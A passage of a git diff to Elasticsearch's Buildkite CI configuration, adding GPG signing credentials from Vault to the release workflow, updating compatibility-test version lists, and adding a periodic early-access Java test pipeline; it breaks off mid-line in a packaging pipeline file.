diff --git a/.backportrc.json b/.backportrc.json index 31698460c2827..1d54b9c2b9264 100644 --- a/.backportrc.json +++ b/.backportrc.json @@ -1,9 +1,9 @@ { "upstream" : "elastic/elasticsearch", - "targetBranchChoices" : [ "main", "9.0", "8.19", "8.18", "8.17", "8.16", "8.15", "8.14", "8.13", "8.12", "8.11", "8.10", "8.9", "8.8", "8.7", "8.6", "8.5", "8.4", "8.3", "8.2", "8.1", "8.0", "7.17", "6.8" ], + "targetBranchChoices" : [ "main", "9.1", "9.0", "8.19", "8.18", "8.17", "8.16", "8.15", "8.14", "8.13", "8.12", "8.11", "8.10", "8.9", "8.8", "8.7", "8.6", "8.5", "8.4", "8.3", "8.2", "8.1", "8.0", "7.17", "6.8" ], "targetPRLabels" : [ "backport" ], "branchLabelMapping" : { - "^v9.1.0$" : "main", + "^v9.1.4$" : "main", "^v(\\d+).(\\d+).\\d+(?:-(?:alpha|beta|rc)\\d+)?$" : "$1.$2" } } \ No newline at end of file diff --git a/.buildkite/hooks/pre-command b/.buildkite/hooks/pre-command index 34d614c7f7a5e..e6b7b1bc3a199 100644 --- a/.buildkite/hooks/pre-command +++ b/.buildkite/hooks/pre-command @@ -64,6 +64,14 @@ if [[ "${USE_LUCENE_SNAPSHOT_CREDS:-}" == "true" ]]; then unset data fi +if [[ "${USE_MAVEN_GPG:-}" == "true" ]]; then + vault_path="kv/ci-shared/release-eng/team-release-secrets/es-delivery/gpg" + ORG_GRADLE_PROJECT_signingKey=$(vault kv get --field="private_key" $vault_path) + ORG_GRADLE_PROJECT_signingPassword=$(vault kv get --field="passphase" $vault_path) + export ORG_GRADLE_PROJECT_signingKey + export ORG_GRADLE_PROJECT_signingPassword +fi + if [[ "${USE_DRA_CREDENTIALS:-}" == "true" ]]; then DRA_VAULT_ROLE_ID_SECRET=$(vault read -field=role-id secret/ci/elastic-elasticsearch/legacy-vault-credentials) export DRA_VAULT_ROLE_ID_SECRET diff --git a/.buildkite/pipelines/dra-workflow.yml b/.buildkite/pipelines/dra-workflow.yml index 36828a6512db8..43a3ff73b9654 100644 --- a/.buildkite/pipelines/dra-workflow.yml +++ b/.buildkite/pipelines/dra-workflow.yml @@ -2,6 +2,7 @@ steps: - command: .buildkite/scripts/dra-workflow.sh env: USE_DRA_CREDENTIALS: "true" + USE_MAVEN_GPG: "true" USE_PROD_DOCKER_CREDENTIALS: "true" agents: provider: gcp diff --git a/.buildkite/pipelines/intake.yml b/.buildkite/pipelines/intake.yml index 93c5c8eecc3fb..1dcba9dd55e55 100644 --- a/.buildkite/pipelines/intake.yml +++ b/.buildkite/pipelines/intake.yml @@ -65,7 +65,7 @@ steps: timeout_in_minutes: 300 matrix: setup: - BWC_VERSION: ["8.17.9", "8.18.4", "8.19.0", "9.0.4", "9.1.0"] + BWC_VERSION: ["8.18.7", "8.19.4", "9.0.7", "9.1.4"] agents: provider: gcp image: family/elasticsearch-ubuntu-2404 diff --git a/.buildkite/pipelines/periodic-fwc.template.yml b/.buildkite/pipelines/periodic-fwc.template.yml index 5154ef36aaacc..c78d3a24a7743 100644 --- a/.buildkite/pipelines/periodic-fwc.template.yml +++ b/.buildkite/pipelines/periodic-fwc.template.yml @@ -1,6 +1,6 @@ steps: - - label: $FWC_VERSION / fwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v$FWC_VERSION#fwcTest -Dtests.bwc.snapshot=false + - label: "{{matrix.FWC_VERSION}} / fwc" + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v$$FWC_VERSION#fwcTest -Dtests.bwc.snapshot=false timeout_in_minutes: 300 agents: provider: gcp @@ -11,4 +11,4 @@ steps: setup: FWC_VERSION: $FWC_LIST env: - FWC_VERSION: $FWC_VERSION + FWC_VERSION: "{{matrix.FWC_VERSION}}" diff --git a/.buildkite/pipelines/periodic-fwc.yml b/.buildkite/pipelines/periodic-fwc.yml index f17ee5574e6e7..561dbca493bb1 100644 --- a/.buildkite/pipelines/periodic-fwc.yml +++ b/.buildkite/pipelines/periodic-fwc.yml @@ -1,7 +1,7 @@ # This file is auto-generated. See .buildkite/pipelines/periodic-fwc.template.yml steps: - - label: $FWC_VERSION / fwc - command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v$FWC_VERSION#fwcTest -Dtests.bwc.snapshot=false + - label: "{{matrix.FWC_VERSION}} / fwc" + command: .ci/scripts/run-gradle.sh -Dbwc.checkout.align=true v$$FWC_VERSION#fwcTest -Dtests.bwc.snapshot=false timeout_in_minutes: 300 agents: provider: gcp @@ -10,6 +10,6 @@ steps: buildDirectory: /dev/shm/bk matrix: setup: - FWC_VERSION: [] + FWC_VERSION: ["9.1.0", "9.1.1", "9.1.2", "9.1.3"] env: - FWC_VERSION: $FWC_VERSION + FWC_VERSION: "{{matrix.FWC_VERSION}}" diff --git a/.buildkite/pipelines/periodic-java-ea.bwc.template.yml b/.buildkite/pipelines/periodic-java-ea.bwc.template.yml new file mode 100644 index 0000000000000..0cd254267192e --- /dev/null +++ b/.buildkite/pipelines/periodic-java-ea.bwc.template.yml @@ -0,0 +1,18 @@ + - label: $BWC_VERSION / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=\$\$JAVA_EA_VERSION -Dbwc.checkout.align=true v$BWC_VERSION#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: $BWC_VERSION + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 diff --git a/.buildkite/pipelines/periodic-java-ea.template.yml b/.buildkite/pipelines/periodic-java-ea.template.yml new file mode 100644 index 0000000000000..088c4cd2c8af3 --- /dev/null +++ b/.buildkite/pipelines/periodic-java-ea.template.yml @@ -0,0 +1,183 @@ +env: + JAVA_EA_VERSION: "${JAVA_EA_VERSION:-25-pre}" + +steps: + - group: bwc + steps: $BWC_STEPS + - label: concurrent-search-tests + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dtests.jvm.argline=-Des.concurrent_search=true -Des.concurrent_search=true functionalTests + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: encryption-at-rest + command: .buildkite/scripts/encryption-at-rest.sh -Druntime.java=$$JAVA_EA_VERSION + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: eql-correctness + command: .buildkite/scripts/eql-correctness.sh -Druntime.java=$$JAVA_EA_VERSION + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: custom-32-98304 + buildDirectory: /dev/shm/bk + - group: java-matrix + steps: + - label: "{{matrix.GRADLE_TASK}} / java-ea" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true $$GRADLE_TASK + timeout_in_minutes: 300 + matrix: + setup: + image: + - windows-2025 + - ubuntu-2404 + GRADLE_TASK: + - checkPart1 + - checkPart2 + - checkPart3 + - checkPart4 + - checkPart5 + - checkPart6 + - checkRestCompat + agents: + provider: gcp + image: family/elasticsearch-{{matrix.image}} + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + env: + GRADLE_TASK: "{{matrix.GRADLE_TASK}}" + - label: "{{matrix.BWC_VERSION}} / matrix-bwc" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v$$BWC_VERSION#bwcTest + timeout_in_minutes: 300 + matrix: + setup: + BWC_VERSION: $BWC_LIST + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + env: + BWC_VERSION: "{{matrix.BWC_VERSION}}" + - label: release-tests + command: .buildkite/scripts/release-tests.sh + timeout_in_minutes: 360 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: single-processor-node-tests + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dtests.configure_test_clusters_with_one_processor=true functionalTests + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - group: third-party tests + steps: + - label: third-party / azure-sas + command: | + export azure_storage_container=elasticsearch-ci-thirdparty-sas + export azure_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION azureThirdPartyTest + env: + USE_3RD_PARTY_AZURE_SAS_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / azure + command: | + export azure_storage_container=elasticsearch-ci-thirdparty + export azure_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION azureThirdPartyTest + env: + USE_3RD_PARTY_AZURE_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / gcs + command: | + export google_storage_bucket=elasticsearch-ci-thirdparty + export google_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION gcsThirdPartyTest + env: + USE_3RD_PARTY_GCS_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / geoip + command: | + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION :modules:ingest-geoip:internalClusterTest -Dtests.jvm.argline="-Dgeoip_use_service=true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / s3 + command: | + export amazon_s3_bucket=elasticsearch-ci.us-west-2 + export amazon_s3_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION s3ThirdPartyTest + env: + USE_3RD_PARTY_S3_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / ms-graph + command: | + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION msGraphThirdPartyTest + env: + USE_3RD_PARTY_MS_GRAPH_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - group: lucene-compat + steps: + - label: "{{matrix.LUCENE_VERSION}} / lucene-compat" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dorg.elasticsearch.build.cache.push=true -Dignore.tests.seed -Dscan.capture-file-fingerprints -Dtests.bwc.main.version=$$ES_VERSION -Dtests.bwc.refspec.main=$$ES_COMMIT luceneBwcTest + timeout_in_minutes: 300 + matrix: + setup: + LUCENE_VERSION: + - "10.0.0" + ES_VERSION: + - "9.0.0" + ES_COMMIT: + - "10352e57d85505984582616e1e38530d3ec6ca59" # update to match last commit before lucene bump maintained from combat-lucene-10-0-0 branch + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: custom-32-98304 + buildDirectory: /dev/shm/bk + env: + ES_VERSION: "{{matrix.ES_VERSION}}" + ES_COMMIT: "{{matrix.ES_COMMIT}}" diff --git a/.buildkite/pipelines/periodic-java-ea.yml b/.buildkite/pipelines/periodic-java-ea.yml new file mode 100644 index 0000000000000..b40f7dbc157f2 --- /dev/null +++ b/.buildkite/pipelines/periodic-java-ea.yml @@ -0,0 +1,621 @@ +# This file is auto-generated. See .buildkite/pipelines/periodic-java-ea.template.yml +env: + JAVA_EA_VERSION: "${JAVA_EA_VERSION:-25-pre}" + +steps: + - group: bwc + steps: + - label: 8.0.1 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.0.1#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.0.1 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.1.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.1.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.1.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.2.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.2.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.2.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.3.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.3.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.3.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.4.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.4.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.4.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.5.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.5.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.5.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.6.2 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.6.2#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.6.2 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.7.1 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.7.1#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.7.1 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.8.2 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.8.2#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.8.2 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.9.2 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.9.2#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.9.2 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.10.4 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.10.4#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.10.4 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.11.4 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.11.4#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.11.4 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.12.2 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.12.2#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.12.2 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.13.4 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.13.4#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.13.4 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.14.3 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.14.3#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.14.3 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.15.5 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.15.5#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.15.5 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.16.6 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.16.6#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.16.6 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.17.10 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.17.10#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.17.10 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.18.7 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.18.7#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.18.7 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 8.19.4 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v8.19.4#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 8.19.4 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 9.0.7 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v9.0.7#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 9.0.7 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 9.1.4 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v9.1.4#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 9.1.4 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: 9.2.0 / bwc + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v9.2.0#bwcTest + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + preemptible: true + env: + BWC_VERSION: 9.2.0 + retry: + automatic: + - exit_status: "-1" + limit: 3 + signal_reason: none + - signal_reason: agent_stop + limit: 3 + + - label: concurrent-search-tests + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dtests.jvm.argline=-Des.concurrent_search=true -Des.concurrent_search=true functionalTests + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: encryption-at-rest + command: .buildkite/scripts/encryption-at-rest.sh -Druntime.java=$$JAVA_EA_VERSION + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: eql-correctness + command: .buildkite/scripts/eql-correctness.sh -Druntime.java=$$JAVA_EA_VERSION + timeout_in_minutes: 300 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: custom-32-98304 + buildDirectory: /dev/shm/bk + - group: java-matrix + steps: + - label: "{{matrix.GRADLE_TASK}} / java-ea" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true $$GRADLE_TASK + timeout_in_minutes: 300 + matrix: + setup: + image: + - windows-2025 + - ubuntu-2404 + GRADLE_TASK: + - checkPart1 + - checkPart2 + - checkPart3 + - checkPart4 + - checkPart5 + - checkPart6 + - checkRestCompat + agents: + provider: gcp + image: family/elasticsearch-{{matrix.image}} + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + env: + GRADLE_TASK: "{{matrix.GRADLE_TASK}}" + - label: "{{matrix.BWC_VERSION}} / matrix-bwc" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true v$$BWC_VERSION#bwcTest + timeout_in_minutes: 300 + matrix: + setup: + BWC_VERSION: ["8.18.7", "8.19.4", "9.0.7", "9.1.4", "9.2.0"] + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n1-standard-32 + buildDirectory: /dev/shm/bk + env: + BWC_VERSION: "{{matrix.BWC_VERSION}}" + - label: release-tests + command: .buildkite/scripts/release-tests.sh + timeout_in_minutes: 360 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - label: single-processor-node-tests + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dtests.configure_test_clusters_with_one_processor=true functionalTests + timeout_in_minutes: 420 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + diskSizeGb: 350 + machineType: custom-32-98304 + - group: third-party tests + steps: + - label: third-party / azure-sas + command: | + export azure_storage_container=elasticsearch-ci-thirdparty-sas + export azure_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION azureThirdPartyTest + env: + USE_3RD_PARTY_AZURE_SAS_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / azure + command: | + export azure_storage_container=elasticsearch-ci-thirdparty + export azure_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION azureThirdPartyTest + env: + USE_3RD_PARTY_AZURE_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / gcs + command: | + export google_storage_bucket=elasticsearch-ci-thirdparty + export google_storage_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION gcsThirdPartyTest + env: + USE_3RD_PARTY_GCS_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / geoip + command: | + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION :modules:ingest-geoip:internalClusterTest -Dtests.jvm.argline="-Dgeoip_use_service=true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / s3 + command: | + export amazon_s3_bucket=elasticsearch-ci.us-west-2 + export amazon_s3_base_path=$BUILDKITE_BRANCH + + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION s3ThirdPartyTest + env: + USE_3RD_PARTY_S3_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - label: third-party / ms-graph + command: | + .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION msGraphThirdPartyTest + env: + USE_3RD_PARTY_MS_GRAPH_CREDENTIALS: "true" + timeout_in_minutes: 30 + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: n2-standard-8 + buildDirectory: /dev/shm/bk + - group: lucene-compat + steps: + - label: "{{matrix.LUCENE_VERSION}} / lucene-compat" + command: .ci/scripts/run-gradle.sh -Druntime.java=$$JAVA_EA_VERSION -Dbwc.checkout.align=true -Dorg.elasticsearch.build.cache.push=true -Dignore.tests.seed -Dscan.capture-file-fingerprints -Dtests.bwc.main.version=$$ES_VERSION -Dtests.bwc.refspec.main=$$ES_COMMIT luceneBwcTest + timeout_in_minutes: 300 + matrix: + setup: + LUCENE_VERSION: + - "10.0.0" + ES_VERSION: + - "9.0.0" + ES_COMMIT: + - "10352e57d85505984582616e1e38530d3ec6ca59" # update to match last commit before lucene bump maintained from combat-lucene-10-0-0 branch + agents: + provider: gcp + image: family/elasticsearch-ubuntu-2404 + machineType: custom-32-98304 + buildDirectory: /dev/shm/bk + env: + ES_VERSION: "{{matrix.ES_VERSION}}" + ES_COMMIT: "{{matrix.ES_COMMIT}}" diff --git a/.buildkite/pipelines/periodic-packaging.yml b/.buildkite/pipelines/periodic-packaging.yml index cac74ac6ebaae..42922ac65924b 100644 --- a/.buildkite/pipelines/periodic-packaging.yml +++ b/.buildkite/pipelines/periodic-packaging.yml @@ -302,8 +302,8 @@ steps: env: BWC_VERSION: 8.16.6 - - label: "{{matrix.image}} / 8.17.9 / 